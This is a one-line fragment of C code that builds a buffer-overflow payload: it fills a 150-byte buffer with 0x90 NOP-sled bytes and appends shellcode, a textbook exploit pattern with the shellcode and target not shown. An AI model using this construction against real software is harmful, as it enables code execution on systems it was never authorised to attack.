memset(buf,0x00,sizeof(buf)); memset(buf,0x90,150-strlen(shellcode)); memcpy(buf+strlen(buf), &shellcode, strlen(shellcode));